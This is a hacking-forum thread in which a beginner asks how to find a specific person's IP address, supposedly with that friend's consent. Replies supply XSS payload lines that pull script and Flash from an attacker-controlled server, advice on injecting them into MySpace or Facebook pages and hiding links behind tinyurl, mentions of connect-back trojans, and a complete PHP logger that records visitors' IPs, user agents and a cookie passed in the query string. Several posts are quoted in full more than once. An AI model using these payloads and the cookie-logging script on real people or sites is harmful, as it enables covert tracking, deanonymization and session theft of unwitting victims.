Jump to content

Target Specific Hack


Posiix
 Share

Recommended Posts

Hi guys,

I posted a few qs a while ago and have since installed Linux with refit (dual boot) on my MBP and purchased gray hat hacking.

I had a general question. I've convinced my buddy to allow me to target his computer, he owes me a 6pack if i gain admin access to his sys... but I dont want to use any of the convenient means of locating his IP that I have at my disposal... I want to assume I know only his name.

Ofcourse names lead to addresses, which lead to wireless networks and WEP hacks.. and/or I could devise a scheme to get him to email me..

What other approaches to obtaining the IP of a specific target are there? I've read alot (into Hacking for Dummies and Gray Hat Hacking) about gaining entrance through ports, and hacking hashes... but as far as getting IP adresses it seems the approaches are not usually target-specific, but rather a more general, scan-and-see-what-turns-up process. For my purposes getting the IP is the first step!

Links to sources are great if they save you time in responding! Thanks a mill guys!

BG

Link to comment
Share on other sites

On your server host a image, 1X1pixel, and either threw xss or som other means have him load that image. Look in your logs and there is his ip.

Write a simple script to ftp upload a file containing his ip. How you make that file is another means.

Instant Message him... Lots of ways to get this method to work, send file...

Does he host anything on his computer, i.e personal home page? Ping hispage.com

List goes on and on...

Link to comment
Share on other sites

On your server host a image, 1X1pixel, and either threw xss or som other means have him load that image. Look in your logs and there is his ip.

Write a simple script to ftp upload a file containing his ip. How you make that file is another means.

Instant Message him... Lots of ways to get this method to work, send file...

Does he host anything on his computer, i.e personal home page? Ping hispage.com

List goes on and on...

Thanks for the response... with respect to the server and the xss, are you talking about having him connect to a personal home page of mine hosted by a server I run locally? And what might that xss code look like (I need to learn simple xss, yah?) For that matter I read alot about having a sever, and I cant figure out why it is so important! is this sort of thing why?

and as for the ftp, are you talking about trying to exploit his FTP if he has one (he doesnt)? or is this again linked into the server approach above?

Im really interested in your response, would you mind elaborating?

Cheers,

BG

Link to comment
Share on other sites

Not going into detail but here are some starter points. For the XSS there are multiple methods. Yes you will need your own server, doesn't matter where its hosted.

<script SRC=http://yourpage.com/xss.js></SCRIPT>

in the xss.js load the image or just replace that script with where the image is.

<EMBED SRC="yourpage.com/xss.swf" AllowScriptAccess="always"></EMBED>

This is a good one because you can get myspace to load it, that way when he visits the ms page you can grab the ip.

XSS is easy but it takes some social engineering. I suggest you start here and move up.

The FTP trick is getting the guy to download and run a file, alot harder than the XSS because you can use tinyurl to mask you xss attack. Windows has a built in ftp upload command and that is why I say use ftp but any way you can make it work do it. You can also just a connect back trojan for this as well, but then you are giving him your ip, not very stealthy.

Link to comment
Share on other sites

Not going into detail but here are some starter points. For the XSS there are multiple methods. Yes you will need your own server, doesn't matter where its hosted.

<script SRC=http://yourpage.com/xss.js></SCRIPT>

in the xss.js load the image or just replace that script with where the image is.

<EMBED SRC="yourpage.com/xss.swf" AllowScriptAccess="always"></EMBED>

This is a good one because you can get myspace to load it, that way when he visits the ms page you can grab the ip.

XSS is easy but it takes some social engineering. I suggest you start here and move up.

The FTP trick is getting the guy to download and run a file, alot harder than the XSS because you can use tinyurl to mask you xss attack. Windows has a built in ftp upload command and that is why I say use ftp but any way you can make it work do it. You can also just a connect back trojan for this as well, but then you are giving him your ip, not very stealthy.

Thanks for the link bro, I'll ensure that I read into it, before you id not heard of XSS at all! Cheers.

At risk of really exposing myself as a newb here, I had (only) a few more questions.

1. How does all of this fit together generally?

For instance, do I reserve some domain, pay for a small hosting on a server somewhere, host the xss script there, then setup an ms page which loads the xss as an image, then I check the log on my host to retrive the data Im looking for? Is that how all these elements are linked together?

2. You mentioned myspace, which other sites are open to this vulnerability? Are there ways of working this through facebook inboxes or chats?

3. You menitoned a 1x1 pixel image. .swf is flash, yeh.. but .js is what? Is that xss mimicking a jpg?

Thanks man.. really appreciate it.

P|x

Link to comment
Share on other sites

I can tell you dont know what you are doing so Im going to just spell it out.

The Setup:

Windows XP Box with internet access

Apahe

PHP

Tinyurl.com

Method 1:

Create a page, index.php, and add this code:

&lt;?php 

$useragent = $_SERVER['HTTP_USER_AGENT']; 
$cookie = $_GET['cookie']; 
$httpreferrer = $_SERVER['HTTP_REFERER']; 
$HttpClientIP = $_SERVER['HTTP_CLIENT_IP']; 
$RemAddr = $_SERVER['REMOTE_ADDR']; 
$CacheControl = $_SERVER['HTTP_CACHE_CONTROL']; 
$XForward = $_SERVER['HTTP_X_FORWARDED_FOR']; 
$querystring = $_SERVER['QUERY_STRING']; 

$filename = 'log.txt'; 
$somecontent = "User Agent: $useragent\n Cookie: $cookie\n HTTP Referrer: $httpreferrer\n HTTP Client IP: $HttpClientIP\n Remote Addr 
ess: $RemAddr\n Cache Control: $CacheControl\n X Forward: $XForward\n Query String: $querystring\n"; 

if (is_writable($filename)) { 

if (!$handle = fopen($filename, 'a')) { 
echo "Cannot open file ($filename)"; 
exit; 
} 

if (fwrite($handle, $somecontent) === FALSE) { 
echo "Cannot write to file ($filename)"; 
exit; 
} 

echo "Success, wrote ($somecontent) to file ($filename)"; 

fclose($handle); 

} else { 
echo "The file $filename is not writable"; 
} 
?&gt;

Change the url at tinyurl.com and send it to him, that will log all the info you need to log.txt in the same directory.

Method 2:

Find a site vulnerable to a xss attack.

The .js is just a obfusication tecnique, you can insert what ever you want as long as the mark downloads it you are able to log that IP address.

Set up an APACHE/PHP server locally, you can go out and find a free service but if its your friend and he knows your doing it then why bother?

Open GIMP/PhotoShop and create a 1x1pixel illistration and save it

host that one your server

Add the location of the pixel to the xss

monitor you hosts file and watch who downloads it.

Most of this has to do with social engineering because you are sending them a link in hopes they will open it. The second method works with emails as well if they choose to view images. As for working this threw facebook, yes you can. There are sites out the dedicated to logging xss vulns found, just find a fresh one and do this.. easy as pie. Even with his IP i doubt you can do anything, if you have no clue as to how to find it what are you going to do when you do have it? Metasploit is good for picking up some older vulnerabilities and fusking with them but what if all he is running on his computer is a browser? What are you going to do then? "Hacking" isnt a point and click type ordeal.

Link to comment
Share on other sites

I can tell you dont know what you are doing so Im going to just spell it out.

The Setup:

Windows XP Box with internet access

Apahe

PHP

Tinyurl.com

Method 1:

Create a page, index.php, and add this code:

&lt;?php 

$useragent = $_SERVER['HTTP_USER_AGENT']; 
$cookie = $_GET['cookie']; 
$httpreferrer = $_SERVER['HTTP_REFERER']; 
$HttpClientIP = $_SERVER['HTTP_CLIENT_IP']; 
$RemAddr = $_SERVER['REMOTE_ADDR']; 
$CacheControl = $_SERVER['HTTP_CACHE_CONTROL']; 
$XForward = $_SERVER['HTTP_X_FORWARDED_FOR']; 
$querystring = $_SERVER['QUERY_STRING']; 

$filename = 'log.txt'; 
$somecontent = "User Agent: $useragent\n Cookie: $cookie\n HTTP Referrer: $httpreferrer\n HTTP Client IP: $HttpClientIP\n Remote Addr 
ess: $RemAddr\n Cache Control: $CacheControl\n X Forward: $XForward\n Query String: $querystring\n"; 

if (is_writable($filename)) { 

if (!$handle = fopen($filename, 'a')) { 
echo "Cannot open file ($filename)"; 
exit; 
} 

if (fwrite($handle, $somecontent) === FALSE) { 
echo "Cannot write to file ($filename)"; 
exit; 
} 

echo "Success, wrote ($somecontent) to file ($filename)"; 

fclose($handle); 

} else { 
echo "The file $filename is not writable"; 
} 
?&gt;

Change the url at tinyurl.com and send it to him, that will log all the info you need to log.txt in the same directory.

Method 2:

Find a site vulnerable to a xss attack.

The .js is just a obfusication tecnique, you can insert what ever you want as long as the mark downloads it you are able to log that IP address.

Set up an APACHE/PHP server locally, you can go out and find a free service but if its your friend and he knows your doing it then why bother?

Open GIMP/PhotoShop and create a 1x1pixel illistration and save it

host that one your server

Add the location of the pixel to the xss

monitor you hosts file and watch who downloads it.

Most of this has to do with social engineering because you are sending them a link in hopes they will open it. The second method works with emails as well if they choose to view images. As for working this threw facebook, yes you can. There are sites out the dedicated to logging xss vulns found, just find a fresh one and do this.. easy as pie. Even with his IP i doubt you can do anything, if you have no clue as to how to find it what are you going to do when you do have it? Metasploit is good for picking up some older vulnerabilities and fusking with them but what if all he is running on his computer is a browser? What are you going to do then? "Hacking" isnt a point and click type ordeal.

D,

Thanks again. I completely understand that hacking is not a simple point and click affair. I have no intention of being a script kiddie, its just that at this point my knowledge is limited and I find it hard at times to see the big picture of how all the various elements of the "craft" (network security) fit together. Thats all I was trying to get at with the above questioning, I'm not asking for specific instructions. But, in order to approach the problem creatively I need a sense of the whole picture, learning the specifics will come second.

I dont plan to be able to make this happen for some time I assure you. Thanks for opening my eyes a little more.

Cheers.

P

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...